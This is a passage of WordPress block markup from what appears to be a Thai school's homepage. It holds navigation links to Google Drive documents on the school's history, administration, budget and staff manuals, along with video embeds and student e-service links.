gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c44218-61\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c44218-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"<img class=\"wp-image-574\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 